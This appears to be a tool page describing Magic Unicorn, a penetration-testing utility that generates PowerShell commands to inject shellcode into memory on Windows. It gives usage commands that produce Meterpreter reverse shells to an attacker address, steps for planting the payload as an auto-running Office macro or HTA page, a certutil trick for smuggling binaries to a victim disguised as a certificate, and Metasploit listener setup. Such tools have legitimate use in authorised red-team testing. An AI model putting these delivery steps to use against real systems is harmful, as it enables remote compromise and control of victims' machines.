PowerShell Downgrade Attack – Magic Unicorn

Last Release: 06/27/2019     Last Commit: 10/22/2019

PowerShell Downgrade Attack – Magic Unicorn

Introduction

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. This tool is based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

PowerShell Downgrade Attack Unicorn on Defcon18

PowerShell Downgrade Attack: Magic Unicorn

Usage is very simple. You just need to make sure you’ve installed Metasploit in the right path and run the Magic Unicorn. Unicorn will automatically generate a powershell command. Copy and paste the powershell code into a command line window or through a payload delivery system:

root@kali:~/Desktop# python unicorn.py

Magic Unicorn Supports:

root@kali:~/Desktop# python unicorn.py
                                                         
                                                         ,/
                                                        //
                                                      ,//
                                          ___   /|   |//
                                      `__/\_ --(/|___/-/
                                   \|\_-\___ __-_`- /-/ \.
                                  |\_-___,-\_____--/_)' ) \
                                   \ -_ /     __ \( `( __`\|
                                   `\__|      |\)\ ) /(/|
           ,._____.,            ',--//-|      \  |  '   /
          /     __. \,          / /,---|       \       /
         / /    _. \  \        `/`_/ _,'        |     |
        |  | ( (  \   |      ,/\'__/'/          |     |
        |  \  \`--, `_/_------______/           \(   )/
        | | \  \_. \,                            \___/\
        | |  \_   \  \                                 \
        \ \    \_ \   \   /                             \
         \ \  \._  \__ \_|       |                       \
          \ \___  \      \       |                        \
           \__ \__ \  \_ |       \                         |
           |  \_____ \  ____      |                        |
           | \  \__ ---' .__\     |        |               |
           \  \__ ---   /   )     |        \              /
            \   \____/ / ()(      \          `---_       /|
             \__________/(,--__    \_________.    |    ./ |
               |     \ \  `---_\--,           \   \_,./   |
               |      \  \_ ` \    /`---_______-\   \\    /
                \      \.___,`|   /              \   \\   \
                 \     |  \_ \|   \              (   |:    |
                  \    \      \    |             /  / |    ;
                   \    \      \    \          ( `_'   \  |
                    \.   \      \.   \          `__/   |  |
                      \   \       \.  \                |  |
                       \   \        \  \               (  )
                        \   |        \  |              |  |
                         |  \         \ \              I  `
                         ( __;        ( _;            ('-_';
                         |___\        \___:            \___:

aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=

                
-------------------- Magic Unicorn Attack Vector -----------------------------

Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy Magic Unicorns.

Magic Unicorn allows native x86 powershell injection attacks on any Windows platform.

Usage:

python unicorn.py payload reverse_ipaddr port

Attack Options:

  • PowerShell Attack Instructions
  • Macro Attack Instructions
  • HTA Attack Instructions
  • Cerutil Attack Instractions
  • Custom PSI Attack Instructions

PowerShell Attack

After you run the following command it generates two files powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the PowerShell attack into memory.

python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443

There are plenty scenarios where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window and it will give a shell back to you.

Note: In order to capture the attack, you’ll need to enable the listener.

You can use .rc file with Metasploit to quickly open up listener on the port you’ve specified.

Macro Attack

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro

Go to File->Properties->Ribbons, and select Developer. Now, you’ll have a developer tab. Create a new macro, call it Auto_Open and paste the generated code into that. This will automatically run.

Note: When copying and pasting the excel, if there are additional spaces that are added you need to remove these after each of the powershell code sections under variable “x” or a syntax error will happen!

HTA Attack

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta

The HTA attack will automatically generate two files. index.html tells the browser to use launcher.hta which contains the malicious powershell injection code. All files will be exported to the hta_access/ folder. Three main files:

  • index.html
  • launcher.hta
  • unicorn.rc

To lunch the listener for Metasploit, run:

msfconsole -r unicorn.rc

Cerutil Attack

python unicorn.py <path_to_payload/exe_encode> crt

The Cerutil attack allows you to take a binary file, move it into a base64 format and use certutil on the victim machine to convert it back to a binary for you. It allows you to transfer a binary to the victim machine through a fake certificate file. To get the base64 output, just place an executable in the path of unicorn and run the following:

python unicorn.py <exe_name> crt

Files will be stored in decode_attack/ folder.

Custom PSI Attack

Custom PS1 Examples:

python unicorn.py harmless.ps1
python unicorn.py myfile.ps1 macro
python unicorn.py muahahaha.ps1 macro 500

This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro.

Other:

  • DDE Office COM Attack
  • Import Cobalt Strike Beacon
  • Custom Shellcode Generation Method
  • SettingContent-ms Extension Method

For more details and instructions check Unicorn GitHub Repository page.